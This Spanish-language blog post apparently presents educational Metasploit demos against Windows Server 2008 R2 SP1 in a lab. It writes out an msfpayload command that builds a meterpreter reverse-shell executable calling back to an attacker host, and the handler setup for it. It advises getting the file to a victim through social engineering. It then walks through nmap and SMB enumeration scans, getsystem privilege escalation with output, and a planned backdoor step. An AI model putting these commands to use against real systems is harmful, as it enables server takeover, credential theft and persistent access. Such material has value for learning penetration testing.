Mostrando entradas con la etiqueta Metasploit. Mostrar todas las entradas
Mostrando entradas con la etiqueta Metasploit. Mostrar todas las entradas

Metasploit en Windows Server 2008 R2 SP1

Gracias a C0lds0ft tendremos en el blog una serie de entradas con la que se pretende demostrar varias técnicas de Hacking con Metasploit en Windows Server 2008 R2 SP1.

Shell Reversa

Este primer video contiene una técnica conocida llamada conexión en reversa (shell reverse), realizado mediante la generación de un archivo ejecutable con la herramienta msfpayload.
En esta demostración con fines educativos se observa un Windows Server 2008 R2 SP1 con IP 192.168.1.39 corriendo sobre un entorno virtualizado del servicio Hyper-V Virtualization y la conexión al equipo atacante mediante Putty (192.168.1.254) donde previamente se construye el archivo .exe, llamado C0lds0ft.exe

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.254 LPORT=4444 X >/root/Escritorio/C0lds0ft.exe

Con este archivo generamos la conexión en reversa desde la víctima, y aquí el ingenio y las técnicas de ingeniería social que se utilice para hacerlo llegar al Target son las que usted tendrá que tener en cuenta para no caer en este tipo de técnicas. 

Posterior a enviado se procede a poner a la escucha así: 

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.254
set LPORT 444
exploit
   
De esta manera cuando la víctima ejecuta el archivo .exe nos da una conexión Meterpreter en reversa, obteniendo total acceso a la maquina. Con esta conexión podría el administrador perder el control del servidor, puesto que entre otras se puede crear usuarios, activar escritorio remoto, descargar archivos, subir archivos, publicar páginas web, modificar IIS, crear DDOS, Phishing, etc.

 

Archivo .PDF Malicioso

En esta parte se mostrara la forma de generar una shell en reversa mediante el envenenamiento de un archivo PDF sobre windows server 2008.  El procedimiento se realiza como se evidencia en los siguientes vídeos.

Primera Parte


Segunda Parte


Escenario Pentesting en Redes

Esto es un escenario importante a la hora de un pentesting en una red, donde tenemos que tener en cuenta algunos puntos como:

    1) Como se compone la red
    2) Cuantos equipos hay en red
    3) Servicios de estos equipos
    4) Bug en los nodos
    5) Ejecutar exploits
    6) Subir privilegios
    7) Instalar backdoor



A la hora de hacer una práctica en red es tratar de cumplir, como mínimo, estos estándares, los cuales tienen la finalidad de obtener los mayores nodos y tener la red completa.

1) Cómo se compone la red

Hay que tener en cuenta como se compone la estructura de esta red ya sea una lan, wlan u otras.

2) Para esto podemos utilizar similitudes de software pero para averiguar cuántos equipos hay en red la mejor es nmap primero verifico mi IP, esto será plataforma Windows.

Iniciamos mirando cual es mi ip ya que maneja un DHCP y me asigno una IP.


Código:
Todo de mi ip desde rango 1 hasta 255 para ver los equipos


Como podemos ver existen tres IP activas con sus respectivos servicios.

    PORT     STATE SERVICE

    21/tcp   open  ftp

    22/tcp   open  ssh

    23/tcp   open  telnet
    80/tcp   open  http
    5431/tcp open  park-agent
    MAC Address: 14:D6:4D:8B:20:42 (Unknown)

    Nmap scan report for 192.168.0.4
    Host is up (0.0026s latency).
    Not shown: 995 filtered ports
    PORT     STATE  SERVICE
    135/tcp  open   msrpc
    139/tcp  open   netbios-ssn
    445/tcp  open   microsoft-ds
    1025/tcp open   NFS-or-IIS
    2869/tcp closed unknown
    MAC Address: 00:16:17:A6:A6:F9 (MSI)

    Nmap scan report for 192.168.0.5
    Host is up (0.0024s latency).
    Not shown: 996 filtered ports
    PORT     STATE  SERVICE
    139/tcp  open   netbios-ssn
    445/tcp  open   microsoft-ds
    2126/tcp closed unknown
    2869/tcp closed unknown
    MAC Address: 00:13:8F:8B:3D:4F (Asiarock Incorporation)


De aquí en adelante ya están las maquinas de la red.



3) Mirando aquí los equipos tienen lo mismo de la parte dos pero ahora veremos el tipo de servicio que se ejecuta y su versión un poco OS fingerprint. 

Mirando el primer equipo es un router, se sigue mirando información mas detallada.



4) Ya sabiendo que protocolos utilizó miremos mas información ahora con scripts de Nmap.

   smb-check-vulns.nse --me dice fallos protocolos
    smb-enum-groups.nse -- grupo de usuario
    smb-enum-processes.nse -- procesos que utiliza
    smb-enum-sessions.nse -- session activa
    smb-enum-users.nse -- todos los usuarios

Ok esto se mostraría de la siguiente forma

--script=smb-check-vulns.nse,smb-enum-users.nse,smb-enum-sessions.nse,smb-enum-groups.nse,smb-enum-processes.nse




Como vemos tenemos información detallada para el pentest.

5) Por ultimo con metasploit es vulnerable a protocolo SMB


Ahora la finalidad es subir todos los privilegios que pueda obtener para instalar backdoor.

6) Subir privilegios

Para esto haremos lo siguiente

    meterpreter> use priv
    meterpreter > getsystem -h
    Usage: getsystem [options]
    Attempt to elevate your privilege to that of local system.
    OPTIONS:
    -h Help Banner.
    -t The technique to use. (Default to ’0′).
    0 : All techniques available
    1 : Service – Named Pipe Impersonation (In Memory/Admin)
    2 : Service – Named Pipe Impersonation (Dropper/Admin)
    3 : Service – Token Duplication (In Memory/Admin)
    4 : Exploit – KiTrap0D (In Memory/User)

Como se puede apreciar existen diferentes técnicas empleadas por la extensión priv para elevar los privilegios de la consola actual, se puede utilizar una de las técnicas o todas, si no se especifica ningún parámetro ningún parámetro se utilizan todas.

   meterpreter > getsystem
    …got system (via technique 1).
    meterpreter > getuid
    Server username: NT AUTHORITY\SYSTEM
    meterpreter >

6) La instalación del backdoor se las debo por que en estos momentos no lo tengo a mano.

Muchas gracias a la entrada de Inp3nt3zt3 su contacto es p3ngohz@hotmail.com si tienen dudas o desean mas información.